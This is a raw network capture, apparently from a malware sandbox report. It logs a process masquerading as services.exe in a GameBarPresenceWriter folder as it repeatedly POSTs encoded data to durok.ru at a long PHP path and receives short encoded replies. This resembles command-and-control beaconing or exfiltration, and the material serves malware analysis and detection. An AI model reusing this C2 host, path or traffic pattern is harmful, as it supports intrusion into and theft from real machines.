                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:39.061249018 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:39.061434984 CET2548OUTData Raw: 59 51 5b 58 51 59 5c 52 5e 58 52 54 56 51 58 52 54 57 5b 59 56 56 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ[XQY\R^XRTVQXRTW[YVVS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')!7(%T![.=:)'>X$[4<,W#=- B<V3+5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:39.579225063 CET801INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:39 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1oEtZkIZIvUMgsobBJL39EEweYiWyvSM6nZMzHhvkxyvsUMSehaRHmA4yrGSlutT48TypBLlWd35%2Bc7c0MRoRMfjiCVd%2FDsq%2FZJ8qwWb5pCVulvV3EZsvHnCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263511f18f795-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5331&min_rtt=1666&rtt_var=6525&sent=9&recv=13&lost=0&retrans=0&sent_bytes=1003&recv_bytes=5290&delivery_rate=1595628&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              84192.168.2.449912104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:39.720262051 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:40.068140984 CET2128OUTData Raw: 59 59 5b 5f 54 55 59 57 5e 58 52 54 56 51 58 57 54 52 5b 59 56 56 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY[_TUYW^XRTVQXWTR[YVVS_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<"0+*=W!;/..>72X04 ?;#<-.4D? ="Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:40.897283077 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:41.149702072 CET948INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:40 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pxSMK%2BqvlGZatTV%2B0z%2B8q8AH3LsTKKWBI7kxRYCobxknbAwUsvtR3BljzoHxMt83HVz62UxJmFe2JKkeIZTOiGC9rKv3CR%2Fss3GQ58PuEZHZkFSo0fV4PwlocA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82635c9ff14257-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8206&min_rtt=1598&rtt_var=13815&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=26807&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 1e 3d 39 09 52 34 12 34 51 2b 3d 0c 50 2a 08 26 04 28 32 22 04 3f 3c 32 53 2a 28 02 0f 20 2a 2e 5d 3d 29 20 5a 26 35 26 59 24 31 2e 5c 05 1d 27 5a 2b 3b 0a 12 30 32 07 11 2a 3e 00 42 28 2e 14 06 30 3f 2f 59 37 15 04 5f 23 31 3f 04 2e 2c 0d 07 39 3c 2f 02 2b 20 29 01 21 07 21 51 0c 1f 38 56 21 5f 38 02 25 2d 3a 0b 35 30 3b 54 25 2b 26 57 35 15 23 54 30 3a 01 5c 32 0d 0d 57 23 13 20 0c 3c 04 31 00 26 2f 00 05 2a 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$=9R44Q+=P*&(2"?<2S*( *.]=) Z&5&Y$1.\'Z+;02*>B(.0?/Y7_#1?.,9</+ )!!Q8V!_8%-:50;T%+&W5#T0:\2W# <1&/*9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              85192.168.2.449913104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:39.825892925 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:40.177405119 CET2548OUTData Raw: 5c 5a 5b 5a 54 58 59 52 5e 58 52 54 56 5b 58 5b 54 54 5b 5c 56 57 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Z[ZTXYR^XRTV[X[TT[\VWS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'+<^?%T!<_8=)W)=$$<#4&Y997>#0+5"Z.#Z*.
                                                                                                                              Dec 26, 2024 17:18:41.001554012 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:41.253739119 CET803INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:41 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZkKi5lDjidx3%2BTjZH2IImemCF0imEXD5FQndOdyUtPlRcwngIMt%2B7Ih2oQRVmeFs50gstg0vcNDDZRSPPk%2Fz%2BkPCYarJYLf0Z8OEU03DM%2B6%2Fir908CrM6KAR7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82635d3fb04246-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2983&min_rtt=1584&rtt_var=3393&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=114214&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              86192.168.2.449919104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:41.618165016 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:41.974330902 CET2548OUTData Raw: 59 5c 5e 5c 54 5c 59 5b 5e 58 52 54 56 5f 58 57 54 50 5b 5c 56 56 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y\^\T\Y[^XRTV_XWTP[\VVSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<!_+:6!T Z,.>4%' #Z T7:\8B?(_+%"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:42.795603991 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:43.285592079 CET794INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:42 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HzMIxLhXlo81RmhCIskGmcH8ZDcFQUWevWUDSvUWVh2SxVHJCpizQ%2BpvQmSydRR08IirCFa6yTg6aANFV82667qATiRJOSogYyxZ1RLF0IBUEeC%2BzfwPCJhoEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263686c48433e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3431&min_rtt=1676&rtt_var=4140&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=92857&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:18:43.435101986 CET794INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:42 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HzMIxLhXlo81RmhCIskGmcH8ZDcFQUWevWUDSvUWVh2SxVHJCpizQ%2BpvQmSydRR08IirCFa6yTg6aANFV82667qATiRJOSogYyxZ1RLF0IBUEeC%2BzfwPCJhoEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263686c48433e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3431&min_rtt=1676&rtt_var=4140&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=92857&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              87192.168.2.449920104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:42.195533037 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:42.552436113 CET2128OUTData Raw: 5c 5a 5e 5b 54 5d 59 56 5e 58 52 54 56 5a 58 53 54 50 5b 58 56 55 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Z^[T]YV^XRTVZXSTP[XVUS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$](W?<>",_.=%=40$, <V7?::'(V,^>5"Z.#Z**
                                                                                                                              Dec 26, 2024 17:18:43.374866962 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:43.625386000 CET948INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:43 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XNbORkcgB62qTXFNazvbEIhoqCbASOxzGWQfD7320cxKEvstOFRDbWZexfYsyvewhmlnCU%2BEbIo3hyVjIf%2FY%2FYIK90%2B5lq9itMpztd4PFqXu9ZYRcqxIrdxPuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82636c0e36c332-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3285&min_rtt=1677&rtt_var=3846&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=100378&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 1e 2a 2a 3f 51 37 2c 06 1e 28 2d 21 0b 3e 57 25 14 2a 22 2e 05 28 01 03 0f 2a 28 3f 56 34 3a 31 05 2a 14 28 13 31 36 32 1f 32 0b 2e 5c 05 1d 27 5f 2b 2b 2c 10 27 22 35 1c 29 10 22 41 29 00 3d 15 33 01 23 5b 21 2b 07 07 20 0f 0a 13 2c 3c 33 06 2c 2f 20 5f 3c 1e 25 02 21 2d 21 51 0c 1f 38 55 36 07 23 5e 26 2d 3a 0d 36 33 3b 1f 31 16 32 53 21 2b 3f 57 27 29 38 05 27 33 28 0b 34 04 3b 53 28 13 07 07 32 59 35 12 3e 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$**?Q7,(-!>W%*".(*(?V4:1*(1622.\'_++,'"5)"A)=3#[!+ ,<3,/ _<%!-!Q8U6#^&-:63;12S!+?W')8'3(4;S(2Y5>9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              88192.168.2.449922104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:43.717396975 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:44.068008900 CET2548OUTData Raw: 59 5e 5e 51 54 5d 59 54 5e 58 52 54 56 51 58 57 54 53 5b 59 56 51 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y^^QT]YT^XRTVQXWTS[YVQS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[<+<)"#1?,>*7&07/ $4?.X.'<(X*"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:44.891454935 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:45.149710894 CET803INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:44 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tvAPwPv%2F56yJ%2BhzGT6PYT0ISf4S22ubm6FmE5n3KKHTF6WvGbt%2FA88k%2BILvoAwRFYdg4luSH8U%2Fxqf%2BHuEbUOeaa0bNGnaU4O3FCCaT2vipM9nvFVSuqoDjLUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263758f708c18-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3470&min_rtt=1988&rtt_var=3710&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=105438&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              89192.168.2.449927104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:44.845799923 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:45.193017960 CET2128OUTData Raw: 59 5d 5e 5c 54 5c 5c 56 5e 58 52 54 56 5d 58 57 54 54 5b 55 56 5e 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^\T\\V^XRTV]XWTT[UV^SYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+<Z(%T!/=%U=$0' #/$T#,_:?_)5"Z.#Z*6
                                                                                                                              Dec 26, 2024 17:18:46.024354935 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:46.286910057 CET953INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:46 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M7szgAUV8kZY3%2F7%2BAhYSDBh2XPLQM4HVn%2BvmoZNj9T%2B9PeY6EkctpTeduhL5e7ReB9Aq1k85xCaI%2FpylHdesuukE0o77TX%2BPeIuBqoBhbyQvM4TxVDtC7L%2BfXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82637c9bb98c57-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4523&min_rtt=2030&rtt_var=5747&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=66439&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 04 29 29 20 0b 23 02 06 57 3c 13 22 14 2a 1f 04 05 2a 32 03 15 28 2f 03 0b 2a 38 34 0e 37 04 08 1e 3e 39 3f 00 26 08 0b 04 25 0b 2e 5c 05 1d 27 5b 28 05 24 58 26 32 0c 01 2a 2e 3a 41 3e 07 2a 02 27 3f 3f 5d 37 15 26 16 20 57 2b 00 2c 2f 28 59 39 2c 37 07 2a 20 22 1f 22 07 21 51 0c 1f 38 53 22 3a 3b 5a 31 10 0f 1d 22 20 37 12 31 01 31 0c 22 15 09 50 24 03 30 00 32 23 23 10 22 2d 01 1f 2b 13 25 03 31 01 3e 01 29 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98')) #W<"**2(/*847>9?&%.\'[($X&2*.:A>*'??]7& W+,/(Y9,7* ""!Q8S":;Z1" 711"P$02##"-+%1>))%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              90192.168.2.449928104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:45.387126923 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:45.740107059 CET2548OUTData Raw: 59 58 5b 58 51 58 5c 57 5e 58 52 54 56 58 58 54 54 52 5b 5f 56 50 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX[XQX\W^XRTVXXTTR[_VPSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<13<**"T$Y,>.=4937,'#<.:#(;*5"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:18:46.565474987 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:46.835933924 CET796INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:46 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TdaTsYy7qNpRCnDpZSxPklIl1VL8qM%2F37y6s8DQ%2FYy5tSWM0kgV%2Fh6uUdfI0t5k5DRGanZ4HDOclvi4aIQ2Y%2FQTFjE%2BdJizRzYuuagDYCZoSiQtDa7RA8NdR7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82637ffb61334e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6981&min_rtt=1811&rtt_var=11020&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=33815&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a
                                                                                                                              Data Ascii: 4=Y]T
                                                                                                                              Dec 26, 2024 17:18:47.046119928 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              91192.168.2.449934104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:47.269145012 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
